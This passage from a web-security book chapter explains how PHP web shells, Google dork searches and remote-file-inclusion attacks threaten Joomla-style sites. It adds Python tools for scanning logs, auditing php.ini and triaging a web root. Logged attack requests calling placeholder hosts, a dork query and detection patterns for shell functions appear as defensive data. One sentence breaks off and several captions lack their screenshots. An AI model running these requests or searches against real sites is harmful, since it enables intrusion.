Zooming in on the tool bar, we see that the shell has several options listed under it. Selecting the FTP Quick brute will work to break the passwords on the site. Once this shell is inserted, possibly through a Trojan horse, the "owner" of the shell can break passwords and log in normally, thus avoiding any nastiness with log files showing weird traffic. Though he or she could easily wipe out the log files with this tool:
Next, you can learn all about the server: what hardware is running, and what the OS build, version, and patch levels are. One note: you will see that Open Base Dir is OFF (not secure). This is one way an attacker could enter the site. Remember our PHP settings? Here is an example where the shell is reporting the server security information. This information was obtained with one of the scanning scripts that report information about your environment:
What shell would be complete without its own ability to connect to your SQL server? The next screenshot is the Execution PHP-code box. The attacker can run PHP commands through this, perhaps as a launching-off point to attack another site. The IP would resolve back to your server, not theirs.
The real power of the command shell is shown in the following screenshot. It has a built-in list of commands ready to execute. Note the passwords, commands, writeable files and folders, configuration files, and more:
This shell has a very handy browsing tool, giving the perpetrator the ability to add, delete, or change files. It can browse all the way to the top root of the server. You can see that the Perms column gives you the ability to change any file or directory permission:
My favorite part of this shell (warning: this is humor) is the following screenshot. These guys take their craft so seriously that they ask for feedback on the shell or hack, and bugs.
But developers of legitimate commercial or open-source applications should also take their craft seriously to avoid instances of hacking.
I have examined the source code of this and I can tell you this is a well-written and a
The next part that follows is this.
Then the following details are displayed.
Details about Databases and Net are shown in the following section of the original screenshot.
The reason I have spent time showing you the shells is to make you aware of the danger lax security represents.
Finding Targets to Attack
A "Dork" is a Google search to locate targets. Those targets can be simply a specific version of an extension or a device such as a webcam on a specific port.
Let us say a bad guy finds out that the extension is vulnerable from one of the many exploits or responsible disclosure sites. He or she could Google all the targets like this:
inurl:"/com_example/"
In this example, com_example would be the extension you are searching for. Once this search is run, it will yield a lovely list of targets.
This sort of thing happens every time a new exploit is reported. Everyone rushes out to try and break into your site. You want to watch your logs for entries such as these:
http://www.yourdomain.com/index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt??
/?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt?
/poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http
These are three examples of recent attacks against a client's domain that I pulled out for this chapter. The top one is a common attack. The test.txt is meant to test your server and pull out variables to help them determine weaknesses. If your site is strengthened and properly configured using htaccess and the other tools mentioned, it should dramatically lower the potential effect of this particular threat on your sites.
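As an added example that is not from the book, here is a small Python scanner that reads Apache combined-log lines and flags the three request shapes quoted above: a parameter whose value is itself a URL, a query string that tries to set a mosConfig_ variable, and PHP code smuggled into a parameter. The sample log lines are constructed from the three requests in this chapter plus one ordinary request for contrast; the IP addresses, timestamps and user agents are made up, and treating every mosConfig_-prefixed parameter as hostile is my generalisation of the single mosConfig_absolute_path line.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in Apache combined log format: the three attack requests quoted
# in the chapter, followed by one harmless request. Addresses and times are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2008:13:55:36 +0000] "GET /index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt?? HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2008:13:55:37 +0000] "GET /?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2008:13:55:38 +0000] "GET /poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2008:13:56:01 +0000] "GET /index.php?option=com_content&task=view&id=12&Itemid=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# One combined-log line: ip ident user [time] "method path proto" status bytes "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself a URL: the classic remote file inclusion shape.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# PHP code smuggled into a parameter, as in the third sample line.
PHP_CODE = re.compile(r"\$\{|\b(?:include|require|eval|exit|system|passthru)\s*\(", re.IGNORECASE)
# Mambo/Joomla 1.0 configuration variables carry this prefix. Treating any attempt to
# set one through the query string as hostile is an assumed generalisation of the
# mosConfig_absolute_path request quoted in the chapter.
CONFIG_PREFIX = "mosConfig_"


def parse_line(line):
    """Split one combined-log line into its fields, or return None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def analyse_path(path):
    """Return a list of human-readable findings for one request path."""
    findings = []
    query = urlsplit(path).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded payloads
        if REMOTE_URL.match(value):
            findings.append(f"remote URL in parameter {name!r} (possible remote file inclusion)")
        if name.startswith(CONFIG_PREFIX):
            findings.append(f"query string tries to set configuration variable {name!r}")
        if PHP_CODE.search(value):
            findings.append(f"PHP code in parameter {name!r}")
    return findings


def scan_log(text):
    """Return one record per log line that carries at least one finding."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = analyse_path(rec["path"])
        if findings:
            hits.append({"ip": rec["ip"], "time": rec["time"], "path": rec["path"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} [{hit['time']}] {hit['path']}")
        for finding in hit["findings"]:
            print(f"    - {finding}")
```

Running the script prints the three hostile requests with their findings and stays silent on the ordinary one; to use it on a real access log, pass the file's contents to scan_log() and page through the output, which is exactly the kind of log-watching the paragraph above recommends.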
What Do I Do Then?
First, assess your own security as much as you can. Hire a professional to check your security after you're through. If you want to use the tools we discussed earlier in this chapter to protect and monitor yourself, a good place to start is your local library or book store, and the Internet.
Educate yourself in these key areas:
• Networking
• DNS
• Very rudimentary TCP or IP
• Apache common log file format
• Basic PHP commands
• .htaccess includes
• php.ini includes
• The tools listed:
    ° NMAP
    ° Wireshark
• Basic Linux commands
• Hacker (read: the bad guys) sites
• Sites such as CERT.ORG
You will need to learn to have patience because, as you start finding issues, you will want your host to fix them. They typically do not like interference and may get upset. Again, do not try anything in this chapter without the express permission of the owner of the computer, host, network, or website.
• Ensure that your host is at the latest patch levels for the OS and the associated moving parts such as Apache, OpenSSL, MySQL (version dependent), and PHP.
• Set your permissions as tightly as possible.
• Fine-tune your site through htaccess and php.ini.
• If you allow uploads, limit the size and sequester them for testing.
• Check your log files frequently.
• Block specific countries that are known to be havens for attacks, IF you do not need traffic from those countries. See the final chapter in this book for a good way to find this information.
• Have an excellent disaster recovery and business continuity plan for your site.
• Back up tapes or CDs of your applications and data.
• License keys or serial numbers.
• Get the secondary host set up and ready.
• Consider Virtual Private Servers, as they help by protecting you from other shared hosts.
• Block nuisance IP addresses.
• Keep apprised of the latest techniques that are being used to break into sites.
• If you note ANY suspicious behavior from your website, contact your host and report a potential security incident.
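The shell screenshot earlier in the chapter reported Open Base Dir OFF, and the list above says to fine-tune php.ini. As an added example that is not part of the book, here is a Python script that parses a php.ini fragment and reports directives left in a weak state, with a constructed weak fragment (matching what the shell reported) beside a hardened counterpart. The set of directives checked, the advice text, and the built-in defaults assumed when a directive is absent are my choices; the open_basedir path in the hardened fragment is a placeholder for the real site.

```python
# Constructed weak php.ini fragment: the state the shell reported (Open Base Dir OFF)
# plus the other directives an uploaded shell or a remote include relies on.
WEAK_INI = """\
; constructed weak configuration, not a real server's file
[PHP]
open_basedir =
allow_url_fopen = On
allow_url_include = On
register_globals = On
display_errors = On
expose_php = On
disable_functions =
"""

# Constructed hardened counterpart. The open_basedir path is a placeholder.
HARDENED_INI = """\
; constructed hardened configuration; paths are placeholders for the real site
[PHP]
open_basedir = "/var/www/example.com/htdocs:/var/www/example.com/tmp"
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
display_errors = Off
expose_php = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
"""

# Values PHP applies when a directive is missing from php.ini (assumed from the PHP
# manual's directive tables). A missing directive is therefore not a safe one.
BUILTIN_DEFAULTS = {
    "open_basedir": "",
    "allow_url_fopen": "1",
    "allow_url_include": "0",
    "register_globals": "0",
    "display_errors": "1",
    "expose_php": "1",
    "disable_functions": "",
}


def php_bool(value):
    """Interpret a php.ini value the way PHP does for boolean directives."""
    return value.strip().strip('"\'').lower() in {"1", "on", "true", "yes"}


def parse_ini(text):
    """Return {directive: value} from php.ini text, skipping comment lines and [sections]."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip().strip('"\'')
    return settings


# (directive, predicate that is True when the effective value is weak, advice)
CHECKS = [
    ("open_basedir", lambda v: v == "",
     "empty, so scripts (and a shell) can read any file the web server user can; restrict it to the site's document root and temp directory"),
    ("allow_url_fopen", php_bool,
     "On; with it Off, PHP will not open http:// URLs, which blunts the remote-include requests seen in the logs"),
    ("allow_url_include", php_bool,
     "On; include() and require() accept remote URLs, the core of remote file inclusion"),
    ("register_globals", php_bool,
     "On; request parameters become PHP variables, which is how a query parameter such as mosConfig_absolute_path can overwrite a script variable"),
    ("display_errors", php_bool,
     "On; error messages reveal paths and versions to anyone who triggers them"),
    ("expose_php", php_bool,
     "On; the PHP version is advertised in response headers"),
    ("disable_functions", lambda v: v == "",
     "empty; command-execution functions such as system() and passthru() remain available to an uploaded shell"),
]


def audit(ini_text):
    """Return [(directive, effective_value, advice)] for every directive left in a weak state."""
    settings = parse_ini(ini_text)
    weak = []
    for directive, is_weak, advice in CHECKS:
        value = settings.get(directive, BUILTIN_DEFAULTS[directive])
        if is_weak(value):
            weak.append((directive, value, advice))
    return weak


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        findings = audit(ini)
        print(f"{label}: {len(findings)} weak setting(s)")
        for directive, value, advice in findings:
            print(f"  {directive} = {value!r}: {advice}")
```

Note that auditing an empty file still reports five weak directives, because PHP's built-in defaults leave open_basedir empty and allow_url_fopen, display_errors and expose_php on; hardening means setting each directive explicitly rather than assuming the absence of a line is safe.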
But What If My Host Won't Cooperate?
Get a new host. It is that simple. Hosts are a dime a dozen and quite a few of them operate as if they don't care, and I have seen my share. They might have grown too fast, they might be resellers of larger hosting operations, they might not share your 'technical opinion'. So what? Get another host and be done with it.
What If My Website Is Broken into and Defaced?
• First, assess the damage.
• IMMEDIATELY make copies of all the logs you can find and remove the copy from the server. This could be useful for law enforcement reasons.
• Ensure that you have a backup. Now would be a good time for a full restoration.
• Contact your host and inform them of the "incident". If the tech is uncooperative, or tells you that it's your fault, ask for his or her supervisor and keep trying till you find someone who can help you out.
• If you don't have a backup, then:
    ° Check every file's permission.
    ° Check every index.php and index.htm or index.html for stuff that does not belong.
    ° Check for odd or increased traffic.
    ° Ask your host to run netstat and other tools to see if there are any processes running that should not be.
    ° Consider rebuilding the site from scratch, including removal of the old hosting account. Yes, it is that important.
What If a Rootkit Has Been Placed on My Server?
This is a vitally important issue. You will want to do a few things first:
• IMMEDIATELY obtain a full backup and understand that it may be full of viruses. This will help with the forensics and legal issues.
• Attempt to locate the rootkit. It may be known by several names:
    ° C99.php
    ° German.php
    ° Arab.php
    ° R57.php
    ° Tst.txt
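For the checks above (file permissions, index files with content that does not belong, and files carrying the shell names listed), here is an added Python example that is not from the book. It walks a web root and reports world-writable files and directories, files whose names match the shells listed above, index files containing constructs that rarely belong in a site's own index page (an assumed heuristic, not something the chapter lists), and files modified within the last week. The sample web root it builds in a temporary directory is constructed for the demonstration; point triage() at the backup copy you took, not at the live server.

```python
import os
import re
import stat
import tempfile
import time

# File names the chapter lists for this family of shells, compared case-insensitively.
KNOWN_SHELL_NAMES = {"c99.php", "german.php", "arab.php", "r57.php", "tst.txt"}
# Index files the chapter says to inspect for content that does not belong.
INDEX_FILES = {"index.php", "index.htm", "index.html"}
# Constructs that rarely belong in a site's own index file (assumed heuristic).
SUSPICIOUS_CONTENT = re.compile(
    r"\b(?:eval|base64_decode|gzinflate|str_rot13|passthru|shell_exec|system|exec|popen|proc_open)\s*\(|<iframe\b",
    re.IGNORECASE,
)


def triage(root, recent_seconds=7 * 24 * 3600, now=None):
    """Walk a web root and return sorted (relative_path, code, detail) findings."""
    now = time.time() if now is None else now
    findings = []

    def rel(path):
        return os.path.relpath(path, root).replace(os.sep, "/")

    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            if os.stat(full).st_mode & stat.S_IWOTH:
                findings.append((rel(full), "world-writable", "directory is writable by everyone"))
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            if st.st_mode & stat.S_IWOTH:
                findings.append((rel(full), "world-writable", "file is writable by everyone"))
            if name.lower() in KNOWN_SHELL_NAMES:
                findings.append((rel(full), "known-shell-name", "file name matches a shell listed in this chapter"))
            if name.lower() in INDEX_FILES:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    match = SUSPICIOUS_CONTENT.search(fh.read())
                if match:
                    findings.append((rel(full), "suspicious-content", f"index file contains {match.group(0)!r}"))
            if now - st.st_mtime < recent_seconds:
                stamp = time.strftime("%Y-%m-%d %H:%M", time.localtime(st.st_mtime))
                findings.append((rel(full), "recently-modified", f"last modified {stamp}"))
    return sorted(findings)


def build_sample_site():
    """Create a constructed throw-away web root: one planted shell, one tampered index file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    old = time.time() - 90 * 24 * 3600  # untouched for three months
    files = {
        "index.php": ("<?php echo 'Welcome'; ?>\n", old),
        "templates/index.html": ("<html><body>template</body></html>\n", old),
        "images/c99.php": ("<?php /* stand-in for a planted shell */ ?>\n", old),
        # freshly written index file carrying an obfuscated-code wrapper (payload omitted)
        "tmp/index.php": ("<?php eval(base64_decode('payload-omitted')); ?>\n", None),
    }
    for relpath, (content, mtime) in files.items():
        full = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
        os.chmod(full, 0o644)
        if mtime is not None:
            os.utime(full, (mtime, mtime))
    # images/ left writable by everyone, as a careless upload folder often is
    for sub, mode in (("templates", 0o755), ("images", 0o777), ("tmp", 0o755)):
        path = os.path.join(root, sub)
        os.chmod(path, mode)
        os.utime(path, (old, old))
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for path, code, detail in triage(site):
        print(f"{code:18} {path:22} {detail}")
```

On the constructed site the report names the world-writable images directory, the planted c99.php, and the tampered tmp/index.php twice (suspicious content and recent modification), while the untouched root index.php and template index.html stay quiet. The recency check is the one most worth tuning: widen recent_seconds to cover the window between your last known-good backup and the defacement.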